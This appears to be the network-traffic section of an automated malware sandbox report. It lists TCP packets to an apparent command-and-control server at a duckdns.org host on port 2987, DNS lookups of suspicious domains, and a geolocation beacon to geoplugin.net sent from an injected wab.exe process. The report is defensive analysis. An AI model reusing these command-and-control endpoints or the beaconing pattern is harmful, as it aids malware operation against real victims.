                                                                                            Apr 19, 2024 19:12:13.135209084 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.135212898 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135231018 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135231972 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.135251045 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135267973 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135282993 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.135287046 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135303974 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.135305882 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135323048 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135339975 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135356903 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.135356903 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135376930 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.135377884 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.137165070 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.230597019 CEST8049740178.237.33.50192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.231190920 CEST4974080192.168.2.4178.237.33.50
                                                                                            Apr 19, 2024 19:12:13.334693909 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.334727049 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.334745884 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.334763050 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.334783077 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.334804058 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.334822893 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.334845066 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.334907055 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.334907055 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.334908009 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.334908009 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.335630894 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.335678101 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.335699081 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.335716009 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.335756063 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.335793972 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.337254047 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337388992 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337407112 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337429047 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337446928 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337464094 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337455034 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.337486982 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337505102 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337523937 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337524891 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.337524891 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.337548018 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.337572098 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337590933 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337609053 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337625980 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337634087 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.337642908 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337655067 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.337661028 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337677956 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337696075 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337704897 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.337713957 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337728024 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.337733030 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337750912 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337769032 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337774992 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.337786913 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337804079 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.337805986 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337822914 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337840080 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337847948 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.337857008 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337867022 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.337876081 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337893963 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337899923 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.337910891 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337929010 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337945938 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337949038 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.337963104 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337971926 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.337980032 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.337996960 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338016033 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338018894 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338035107 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338052034 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338062048 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338068962 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338085890 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338087082 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338105917 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338123083 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338131905 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338141918 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338152885 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338160038 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338176012 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338192940 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338205099 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338211060 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338227987 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338229895 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338248968 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338265896 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338285923 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338288069 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338288069 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338303089 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338321924 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338337898 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338340044 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338356018 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338361025 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338373899 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338392019 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338407993 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338416100 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338426113 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338434935 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338444948 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338462114 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338479042 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338488102 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338495970 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338507891 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338515043 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338531971 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338538885 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338550091 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338566065 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338583946 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338592052 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338602066 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338610888 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338622093 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338639975 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338656902 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338663101 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338675976 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338681936 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338695049 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338711977 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338720083 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338728905 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338747978 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338764906 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338771105 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338783026 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338789940 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338803053 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338821888 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338839054 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338850021 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338857889 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338871002 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338876963 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338893890 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338912964 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338917971 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338928938 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338937044 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.338954926 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338973999 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.338990927 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339000940 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339008093 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339023113 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339027882 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339045048 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339046001 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339065075 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339081049 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339099884 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339107990 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339117050 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339127064 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339135885 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339154005 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339164972 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339170933 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339188099 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339205980 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339206934 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339222908 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339241982 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339250088 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339257956 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339272022 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339277029 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339293957 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339312077 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339318991 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339329004 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339339972 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339345932 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339364052 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339373112 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339380026 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339399099 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339411020 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339416981 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339433908 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339449883 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339457989 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339467049 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339476109 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339484930 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339502096 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339512110 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339519978 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339536905 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339555979 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339562893 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339572906 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339582920 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339591026 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339607954 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339626074 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339632034 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339644909 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339651108 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:13.339664936 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:13.339721918 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:15.843961000 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:16.046437025 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:16.046947956 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:16.047183037 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:16.249686956 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:16.249718904 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:16.256575108 CEST2987149739193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:16.257318020 CEST4973929871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:26.536947966 CEST2987149738193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:26.538985014 CEST4973829871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:26.782613993 CEST2987149738193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:56.585899115 CEST2987149738193.222.96.21192.168.2.4
                                                                                            Apr 19, 2024 19:12:56.588608980 CEST4973829871192.168.2.4193.222.96.21
                                                                                            Apr 19, 2024 19:12:56.844500065 CEST2987149738193.222.96.21192.168.2.4

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Apr 19, 2024 19:12:07.224807978 CEST6307253192.168.2.41.1.1.1
                                                                                            Apr 19, 2024 19:12:07.550573111 CEST53630721.1.1.1192.168.2.4
                                                                                            Apr 19, 2024 19:12:10.912658930 CEST4964653192.168.2.41.1.1.1
                                                                                            Apr 19, 2024 19:12:11.058248043 CEST53496461.1.1.1192.168.2.4
                                                                                            Apr 19, 2024 19:12:11.704798937 CEST6135553192.168.2.41.1.1.1
                                                                                            Apr 19, 2024 19:12:11.813088894 CEST53613551.1.1.1192.168.2.4

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Apr 19, 2024 19:12:07.224807978 CEST192.168.2.41.1.1.10xdc59Standard query (0)ricohltd.topA (IP address)IN (0x0001)false
                                                                                            Apr 19, 2024 19:12:10.912658930 CEST192.168.2.41.1.1.10xa31cStandard query (0)learfo55ozj01.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Apr 19, 2024 19:12:11.704798937 CEST192.168.2.41.1.1.10x1837Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Apr 19, 2024 19:12:07.550573111 CEST1.1.1.1192.168.2.40xdc59No error (0)ricohltd.top104.21.60.38A (IP address)IN (0x0001)false
                                                                                            Apr 19, 2024 19:12:07.550573111 CEST1.1.1.1192.168.2.40xdc59No error (0)ricohltd.top172.67.191.112A (IP address)IN (0x0001)false
                                                                                            Apr 19, 2024 19:12:11.058248043 CEST1.1.1.1192.168.2.40xa31cNo error (0)learfo55ozj01.duckdns.org193.222.96.21A (IP address)IN (0x0001)false
                                                                                            Apr 19, 2024 19:12:11.813088894 CEST1.1.1.1192.168.2.40x1837No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • ricohltd.top
                                                                                            • geoplugin.net

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.449740178.237.33.50807812C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Apr 19, 2024 19:12:12.021416903 CEST71OUTGET /json.gp HTTP/1.1
                                                                                            Host: geoplugin.net
                                                                                            Cache-Control: no-cache
                                                                                            Apr 19, 2024 19:12:12.231025934 CEST1171INHTTP/1.1 200 OK
                                                                                            date: Fri, 19 Apr 2024 17:12:12 GMT
                                                                                            server: Apache
                                                                                            content-length: 963
                                                                                            content-type: application/json; charset=utf-8
                                                                                            cache-control: public, max-age=300
                                                                                            access-control-allow-origin: *
                                                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 61 72 69 65 74 74 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 47 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 32 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 34 2e 30 34 31 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 38 34 2e 35 30 35 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 31 30 30 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 